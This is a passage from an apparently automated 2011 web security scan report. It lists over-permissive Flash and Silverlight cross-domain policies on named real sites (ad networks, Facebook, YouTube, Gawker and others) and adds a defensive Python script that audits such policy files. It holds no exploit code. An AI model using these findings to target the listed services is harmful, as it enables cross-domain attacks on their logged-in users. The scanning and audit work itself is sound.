<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.reuters.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.powervideosuite.com" />
...[SNIP]...
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
<allow-access-from domain="212.86.251.190"/>
...[SNIP]...
<allow-access-from domain="*.crunchyroll.com" />
...[SNIP]...
<allow-access-from domain="*.techmatter.com" />
...[SNIP]...
<allow-access-from domain="*.amazon.com" />
...[SNIP]...
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.attributor.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.blinkx.com" />
<allow-access-from domain="*.boxee.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.buddytv.com" />
<allow-access-from domain="*.cbsmobile.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.comcast.com" />
<allow-access-from domain="*.comcastnet.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.et.com" />
<allow-access-from domain="*.fanpop.com" />
<allow-access-from domain="*.freestream.com" />
<allow-access-from domain="*.fuhu.com" />
<allow-access-from domain="*.gotuit.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.harpers.com" />
<allow-access-from domain="*.hp.com" />
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.iwidget.com" />
<allow-access-from domain="*.joost.com" />
<allow-access-from domain="*.meevee.com" />
<allow-access-from domain="*.metacafe.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnsearch.com" />
<allow-access-from domain="*.netflix.com" />
<allow-access-from domain="*.radio.com" />
<allow-access-from domain="*.sands.com" />
<allow-access-from domain="*.showtime.com" />
<allow-access-from domain="*.slide.com" />
<allow-access-from domain="*.sling.com" />
<allow-access-from domain="*.sony.com" />
<allow-access-from domain="*.tidaltv.com" />
<allow-access-from domain="*.transpond.com" />
<allow-access-from domain="*.tvguide.com" />
<allow-access-from domain="*.tvstations.com" />
<allow-access-from domain="*.veoh.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...
<allow-access-from domain="*.bing.com" />
...[SNIP]...
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.fancast.com" />
<allow-access-from domain="*.blinx.com" />
<allow-access-from domain="apps.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ustream.tv"/>
...[SNIP]...
<allow-access-from domain="*.sho.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net"/>
...[SNIP]...
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ooyala.com"/>
...[SNIP]...
<allow-access-from domain="*.yldmgrimg.net"/>
...[SNIP]...
<allow-access-from domain="*.cstv.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com"/>
...[SNIP]...
<allow-access-from domain="*.maxpreps.com.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.livestream.com"/>
...[SNIP]...
<allow-access-from domain="*.justin.tv"/>
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

3.30. http://network.alluremedia.com.au/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://network.alluremedia.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: network.alluremedia.com.au

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:54 GMT
Server: Apache/2.2.9
Last-Modified: Thu, 31 Mar 2011 02:37:43 GMT
ETag: "7e470-d3-49fbe2d82ebc0"
Accept-Ranges: bytes
Content-Length: 211
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.edgefcs.net" />
</cross-dom
...[SNIP]...

3.31. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 03:46:12 GMT
Expires: Fri, 13 May 2011 03:46:12 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 34981
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.32. http://services.digg.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://services.digg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Both entries visible in the response also set secure="false". That attribute only takes effect when the policy file itself is served over HTTPS, in which case it lets SWFs loaded over plain HTTP interact with the HTTPS site; on the HTTP response shown here it has no effect, so check whether the same file is also served on port 443.

Request

GET /crossdomain.xml HTTP/1.0
Host: services.digg.com

Response

HTTP/1.0 200 OK
Connection: Keep-Alive
Etag: "de82c156de1cf394d6473937a6097bac9606d89d"
Content-Type: text/x-cross-domain-policy
Content-Length: 359
Server: TornadoServer/0.1

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.widgetserver.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.widgetbox.com" secure="false" />
...[SNIP]...

3.33. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Thu, 12 May 2011 13:28:56 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.34. http://tags.gawker.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tags.gawker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Several ad-network domains (*.doubleclick.net, *.doubleclick.com, *.2mdn.net, *.dartmotif.net) appear twice in the response, once with secure="true" and once with secure="false". Access is granted if any entry matches, so the secure="false" entries govern; if this policy is also served over HTTPS, SWFs loaded over plain HTTP from those domains can interact with it.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.gawker.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Thu, 12 May 2011 13:28:32 GMT
ETag: "5a10ad-424-4a1fd0c3d89c0"
GawkerApplication: ganja
GawkerApplicationHost: Ganja
GawkerHost: GM68 - Request took D=2339 at t=1305206912838152 on site fetch.gawker.com (live)
Last-Modified: Thu, 28 Apr 2011 16:28:31 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Server: Apache
X-Cookie-Set: 0
Content-Length: 1060
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="gawker.com" />
   <allow-access-from domain="*.gawker.com" />
   <allow-access-from domain="*.gawkerassets.com" />
   <allow-access-from domain="now.sprint.com" />
   <allow-access-from domain="*.chartbeat.com" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gstatic.com" secure="false"/>
...[SNIP]...

3.35. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.27.47.102
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.36. http://www.stumbleupon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:13:29 GMT
Content-Type: application/xml
Content-Length: 460
Date: Thu, 12 May 2011 13:29:34 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...

3.37. http://www.youtube.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:29:28 GMT
Server: Apache
Last-Modified: Thu, 02 Sep 2010 06:29:07 GMT
ETag: "132-48f40ee6332c0"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

3.38. http://www.zdnet.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zdnet.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:55 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1032
Keep-Alive: timeout=15, max=999
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.builder.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="*.eyewonderlabs.com" />
...[SNIP]...

4. Silverlight cross-domain policy
There are 5 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
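A quick way to apply the review above across both policy formats is to parse the files and classify each grant the way the scanner does: a bare "*" (or a scheme-only "http://*") is an any-domain grant and rates High; a wildcard subdomain or an explicit third-party domain rates Low but still names a trust relationship that has to be justified. The following Python script is an added example for this report, not code from Burp Suite or Hoyt LLC. Its sample policies are built from the truncated responses in 3.38, 4.2 and 4.5, with the cut-off closing tags supplied, and the severity labels mirror the ones used in this report.

```python
"""Audit Flash (crossdomain.xml) and Silverlight (clientaccesspolicy.xml)
cross-domain policies for over-broad origin grants.

Added example for this report, not Burp Suite code. The sample policies
below are constructed from the truncated responses captured in sections
3.38, 4.2 and 4.5 (closing tags supplied where the capture was cut off)."""
import xml.etree.ElementTree as ET

HIGH, LOW = "High", "Low"


def classify(pattern: str) -> tuple:
    """Map one allowed-origin pattern to (severity, reason).

    Accepts Flash domain="..." values and Silverlight uri="..." values;
    the latter may carry a scheme (e.g. http://*.example.com), which is
    stripped so both forms are judged on the host part."""
    host = pattern.split("://", 1)[1] if "://" in pattern else pattern
    host = host.rstrip("/").lower()
    if host == "*":
        return HIGH, "allows any domain"
    if host.startswith("*.") and host.count("*") == 1:
        return LOW, "wildcard: every subdomain of %s is trusted" % host[2:]
    if "*" in host:
        return LOW, "multi-level wildcard: every subdomain depth of %s is trusted" % host.split("*.")[-1]
    return LOW, "explicit third-party domain %s is trusted" % host


def audit_flash_policy(xml_text: str) -> list:
    """Findings for every <allow-access-from> in a crossdomain.xml."""
    # stdlib expat does not fetch the external DTD named in the DOCTYPE;
    # for untrusted input in production prefer defusedxml.
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        severity, reason = classify(domain)
        if el.get("secure", "true").lower() == "false":
            reason += '; secure="false" lets plain-HTTP SWFs reach an HTTPS host'
        findings.append({"source": "flash", "pattern": domain,
                         "severity": severity, "reason": reason})
    return findings


def audit_silverlight_policy(xml_text: str) -> list:
    """Findings for every <domain> under <allow-from> in a clientaccesspolicy.xml."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []
    for policy in root.iter("policy"):
        allow = policy.find("allow-from")
        if allow is None:
            continue
        any_headers = allow.get("http-request-headers", "") == "*"
        for d in allow.findall("domain"):
            uri = d.get("uri", "")
            severity, reason = classify(uri)
            if any_headers:
                reason += '; http-request-headers="*" lets callers set arbitrary request headers'
            findings.append({"source": "silverlight", "pattern": uri,
                             "severity": severity, "reason": reason})
    return findings


def worst_severity(findings: list):
    """Report-style roll-up: one any-domain grant makes the whole policy High."""
    if not findings:
        return None
    return HIGH if any(f["severity"] == HIGH for f in findings) else LOW


# Constructed from the zdnet.com response in 3.38 (list shortened).
FLASH_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.*.cnet.com" />
<allow-access-from domain="*.eyewonder.com" />
</cross-domain-policy>
"""
# Constructed from the ad.doubleclick.net response in 4.2; the capture ends at
# "<resource", so the grant-to element and closing tags are supplied here.
SILVERLIGHT_ANY = """<?xml version="1.0" encoding="utf-8"?>
<access-policy><cross-domain-access><policy>
<allow-from><domain uri="*"/></allow-from>
<grant-to><resource path="/" include-subpaths="true"/></grant-to>
</policy></cross-domain-access></access-policy>"""
# Constructed from the cdn.eyewonder.com response in 4.5 (same completion).
SILVERLIGHT_HTTP_ANY = """<?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="http://*"/></allow-from><grant-to><resource path="/" include-subpaths="true"/></grant-to></policy></cross-domain-access></access-policy>"""

if __name__ == "__main__":
    for label, findings in (("zdnet crossdomain.xml", audit_flash_policy(FLASH_POLICY)),
                            ("doubleclick clientaccesspolicy.xml", audit_silverlight_policy(SILVERLIGHT_ANY)),
                            ("eyewonder clientaccesspolicy.xml", audit_silverlight_policy(SILVERLIGHT_HTTP_ANY))):
        print(label, "->", worst_severity(findings))
        for f in findings:
            print("   %-5s %-20s %s" % (f["severity"], f["pattern"], f["reason"]))
```

The eyewonder policy shows why the scheme is stripped before classification: "http://*" is an any-domain grant in Silverlight terms even though it is not a literal "*", and its http-request-headers="*" attribute additionally lets a calling client set arbitrary headers on the cross-domain request.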


4.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT
Date: Thu, 12 May 2011 13:27:56 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.2. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Thu, 12 May 2011 13:28:00 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 13:27:54 GMT
Date: Thu, 12 May 2011 13:27:54 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.4. http://b.voicefive.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

